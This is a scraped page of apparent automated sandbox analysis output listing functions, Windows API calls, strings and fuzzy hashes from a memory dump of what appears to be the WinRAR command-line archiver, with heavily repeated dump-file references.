Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: 6e294513f190de905fc3ebc65963512200289f92f0a3c5cab2213f710d297744
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: FC11632A61874185EB11AF29A8005A9B760FF85BC8FC45132EA6F07AD5DF3CD106C790

Function 00007FF7F7E87A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF7F7E87BF3

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: 5c5939b4408578c636bb17f45978b84e4d24020e2a7a6674a806dd7389619368
Instruction ID: a304fe64145dd9fc4e7a08f73bd6bbb91179a10ca558f13a158837256563e4b0
Opcode Fuzzy Hash: 5c5939b4408578c636bb17f45978b84e4d24020e2a7a6674a806dd7389619368
Instruction Fuzzy Hash: 77E1D06AA08AD285EB10EB64E044BED67A5FB4974CF854036CE5E077C1DF3CE556C3A0

Function 00007FF7F7EA2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF7F7EA25B0
WriteFile.KERNEL32 ref: 00007FF7F7EA25F9
WriteFile.KERNELBASE ref: 00007FF7F7EA262E
GetLastError.KERNEL32 ref: 00007FF7F7EA2658
SetLastError.KERNEL32 ref: 00007FF7F7EA2689

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 7b8d1d586aed8f7b8d99d8171d2b07c74a49c4299c7540fe5e2c2a69b9ba5526
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: 2A51B72AA0964187FB24EF25E51437AA3A0FB84B50F844136DE6F57AD0DF3CE547C690

Function 00007FF7F7EA1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7F7EA1F4A
GetLastError.KERNEL32 ref: 00007FF7F7EA1F59
CreateFileW.KERNELBASE ref: 00007FF7F7EA1F99
GetLastError.KERNEL32 ref: 00007FF7F7EA1FA2
SetFileTime.KERNEL32 ref: 00007FF7F7EA1FF1

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: d3e6eddf39d9ad70e44beef9f060447bbbec2a35937186a36a5c2a0abd78fbf8
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: 5B415B7AB1818146F7609F24E5047A9ABA0AB457B8F844336DE7E037C4DF7CD4468790

Function 00007FF7F7E96AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E96C13

Strings

switches_%ls=, xrefs: 00007FF7F7E96C03
switches=, xrefs: 00007FF7F7E96B80
rar.ini, xrefs: 00007FF7F7E96B37

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: cd3b922c051911786e0e94f45be678839d5a6be4522ea76c52e4aa5f0a355342
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: 1541802AA1868291EB14FB21E4505F9A3A1FB447A4FC40537EA7F03AD5EF3CD556C3A0

Function 00007FF7F7EB7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F7ECB470: GetModuleHandleW.KERNEL32 ref: 00007FF7F7ECB488
Part of subcall function 00007FF7F7ECB470: GetProcAddress.KERNEL32 ref: 00007FF7F7ECB4A0
Part of subcall function 00007FF7F7ECB470: GetProcAddress.KERNEL32 ref: 00007FF7F7ECB4D5

Part of subcall function 00007FF7F7E97A68: setbuf.LIBCMT ref: 00007FF7F7E97A7B
Part of subcall function 00007FF7F7E97A68: setbuf.LIBCMT ref: 00007FF7F7E97A8F

SetErrorMode.KERNELBASE ref: 00007FF7F7EB7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF7F7EB7E65

Part of subcall function 00007FF7F7EC48CC: GetVersionExW.KERNEL32(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC496A
Part of subcall function 00007FF7F7EC48CC: LoadLibraryW.KERNELBASE(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4993

new.LIBCMT ref: 00007FF7F7EB7EA8

Strings

rar.lng, xrefs: 00007FF7F7EB7E7D

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: 6fc4525e2c01ff75cb1dc090003bc499e9c9e61f59ac89338f9cf421c4d87ded
Instruction ID: e3a547d9b63ac19b086a6855df19732e34a2ea18ceab3de4a08299c3dd683e1f
Opcode Fuzzy Hash: 6fc4525e2c01ff75cb1dc090003bc499e9c9e61f59ac89338f9cf421c4d87ded
Instruction Fuzzy Hash: 4E41812EA0828245EB10BB28A4111B9E7A1AF55764FC40137D92F0B6E6CE6DE417C7F0

Function 00007FF7F7EB40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF7F7EB4432,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF7F7EB40F1

Part of subcall function 00007FF7F7EA3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7F7EB413F,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA34A0
Part of subcall function 00007FF7F7EA3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7F7EB413F,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA34D5

Strings

WinRAR, xrefs: 00007FF7F7EB410F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 430242d2ecd13933da141b0985e0e94802cf6561e577c70af27e3fe0a076b64b
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: 2021841AA0874240EB50BF1AF8501BA9760AF99BD4F945032DF2F47795DE3CD4468790

Function 00007FF7F7EE978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE97A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE9807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE9841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE986B

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: f85b3348bb992e6f4db0a7fc2439cae9ed3a7ebe44c8ebddca8e0fc4439fbd63
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: 1C21A225E08B5181E720AF12A840029E7E4FB54BD0F894536DEAF27BE5DF3CD4538395

Function 00007FF7F7EA1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7F7EA21A7,00000000,00000028,?,00007FF7F7E97792), ref: 00007FF7F7EA1C97
ReadFile.KERNELBASE ref: 00007FF7F7EA1CB6
GetLastError.KERNEL32 ref: 00007FF7F7EA1CEA
GetLastError.KERNEL32 ref: 00007FF7F7EA1D08

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: f9db43767d4175f3b2ac719de960506e03b939263eca97748c4ca593c23d3c63
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: C4218E39E0864682FB64AB21F500379E7B5BF41B95F904133EA7F476C8CE3DD84286A1

Function 00007FF7F7E949F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

default.sfx, xrefs: 00007FF7F7E94AB0
AFUM, xrefs: 00007FF7F7E94B8C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: 4c5a7e4194f59c26fa03fdb02acace18ebe03e0033193ba5be5730c7beb0ddb3
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: EE81A92BA0C64244FB60BB1095402BAA3B0AF52784FC48137DEAF076C5DF6D958BC7B0

Function 00007FF7F7EE65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7F7EE662E
GetFileType.KERNELBASE ref: 00007FF7F7EE6644

Strings

@, xrefs: 00007FF7F7EE666F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: 73c98057e3716bdc64801e3299307836a8900126dc9554537cce34044da82aa3
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: 9021E52AA2874340EB609B249490039A766FB45774F6A1737DA7F077D4CE3CE883C392

Function 00007FF7F7ECB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF7F7ECB9F8
SetThreadPriority.KERNEL32 ref: 00007FF7F7ECBA4E

Part of subcall function 00007FF7F7E9CDA4: wcschr.LIBVCRUNTIME ref: 00007FF7F7E9CE0F
Part of subcall function 00007FF7F7E9CDA4: wcschr.LIBVCRUNTIME ref: 00007FF7F7E9CE22

Part of subcall function 00007FF7F7E9CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7E9CEDE

Strings

CreateThread failed, xrefs: 00007FF7F7ECBA06

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: fd6fb3dc78ee63b55f7d162ed3b5034a351fb176f9029c6f8bd737ddfd5f0692
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 5611603A908A4282E705FB21E8401BAB370FB84794FD44033D6AE036A9DF7CE547C7A0

Function 00007FF7F7ECBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF7F7ECBB79), ref: 00007FF7F7ECBBB9
SetEvent.KERNEL32 ref: 00007FF7F7ECBBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF7F7ECBBD8

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

